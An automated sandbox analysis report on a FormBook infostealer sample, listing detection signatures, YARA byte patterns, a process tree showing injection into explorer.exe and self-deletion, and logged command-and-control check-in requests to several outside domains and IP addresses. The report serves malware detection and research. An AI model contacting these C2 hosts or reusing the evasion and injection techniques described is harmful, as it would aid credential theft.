Windows Analysis Report ejecutable1.exe

Overview

General Information

Sample Name:ejecutable1.exe
Analysis ID:491544
MD5:ff2724ddf0ef0525e9e419db5199e96f
SHA1:3cda3d12e93a6e06f22e205010cb6c3d674285a1
SHA256:5a5510cd8e0b77c01caac5b519c66d07d1621682e08179ead01adbc8d517b913

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • ejecutable1.exe (PID: 788 cmdline: 'C:\Users\user\Desktop\ejecutable1.exe' MD5: FF2724DDF0EF0525E9E419DB5199E96F)
    • ejecutable1.exe (PID: 2656 cmdline: C:\Users\user\Desktop\ejecutable1.exe MD5: FF2724DDF0EF0525E9E419DB5199E96F)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • msdt.exe (PID: 2632 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: F67A64C46DE10425045AF682802F5BA6)
          • cmd.exe (PID: 1172 cmdline: /c del 'C:\Users\user\Desktop\ejecutable1.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp
  Rule: Formbook
  Description: detect Formbook in memory
  Author: JPCERT/CC Incident Response Group
  Strings:
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Sigma Overview

      System Summary:

      Sigma detected: Possible Applocker Bypass
      Source: Process started, Author: juju4, Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 2632

      Jbx Signature Overview

      AV Detection:

      Multi AV Scanner detection for submitted file
      Source: ejecutable1.exe, Virustotal: Detection: 36%
      Source: ejecutable1.exe, ReversingLabs: Detection: 13%
      Yara detected FormBook
      Source: Yara match, File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: 2.2.ejecutable1.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
      Source: ejecutable1.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: ejecutable1.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: wntdll.pdb, source: ejecutable1.exe, msdt.exe
      Source: Binary string: msdt.pdb, source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

      Networking:

      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe, Domain query: www.dunedinhyperlocal.com
      Source: C:\Windows\explorer.exe, Domain query: www.multicoininvestment.com
      Source: C:\Windows\explorer.exe, Domain query: www.wwiilive.com
      Source: C:\Windows\explorer.exe, Domain query: www.institutosamar.com
      Source: C:\Windows\explorer.exe, Domain query: www.petersonmovingco.com
      Source: C:\Windows\explorer.exe, Domain query: www.quinnwebster.top
      Source: C:\Windows\explorer.exe, Domain query: www.lianxiwan.xyz
      Source: C:\Windows\explorer.exe, Domain query: www.oinfoproduto.com
      Source: C:\Windows\explorer.exe, Domain query: www.theseattlenotary.com
      Performs DNS queries to domains with low reputation
      Source: C:\Windows\explorer.exe, DNS query: www.lianxiwan.xyz
      Source: DNS query: www.lianxiwan.xyz
      Source: global traffic, HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1 Host: www.wwiilive.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1 Host: www.dunedinhyperlocal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1 Host: www.oinfoproduto.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1 Host: www.multicoininvestment.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1 Host: www.theseattlenotary.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1 Host: www.petersonmovingco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1 Host: www.quinnwebster.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 27 Sep 2021 15:32:40 GMT Server: nginx/1.19.5 Content-Type: text/html Content-Length: 583 Last-Modified: Sat, 24 Jul 2021 10:05:02 GMT Accept-Ranges: bytes Vary: Accept-Encoding Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
      Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmp, String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmp, String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp, String found in binary or memory: http://business.google.com/
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp, String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000003.00000000.428142762.0000000003E50000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667305054.00000000020E0000.00000002.00020000.sdmp, String found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: msdt.exe, 00000004.00000002.666538687.00000000003F9000.00000004.00000020.sdmp, msdt.exe, 00000004.00000002.666548050.0000000000406000.00000004.00000020.sdmp, String found in binary or memory: http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e
      Source: explorer.exe, 00000003.00000000.414954186.0000000007147000.00000004.00000001.sdmp, String found in binary or memory: http://www.mozilla.com0
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000003.00000000.413576733.0000000004513000.00000004.00000001.sdmp, String found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000003.00000000.433820327.0000000008434000.00000004.00000001.sdmp, String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: ejecutable1.exe, ejecutable1.exe, 00000002.00000000.405132537.0000000000F52000.00000020.00020000.sdmp, msdt.exe, 00000004.00000002.668352306.0000000002A87000.00000004.00020000.sdmp, String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.windows.com/pctv.
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp, String found in binary or memory: https://ads.google.com/localservices
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp, String found in binary or memory: https://business.google.com
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp, String found in binary or memory: https://schema.org/Locuseriness
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: https://support.mozilla.org
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp, String found in binary or memory: https://workspace.google.com
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: unknown, DNS traffic detected: queries for: www.wwiilive.com

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara match, File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      .NET source code contains very large strings
      Source: ejecutable1.exe, Darwin.WindowsForm/SearchResults.cs, Long String: Length: 34816
      Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.cs, Long String: Length: 34816
      Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/SearchResults.cs, Long String: Length: 34816
      Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/SearchResults.cs, Long String: Length: 34816
      Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.cs, Long String: Length: 34816
      Source: ejecutable1.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
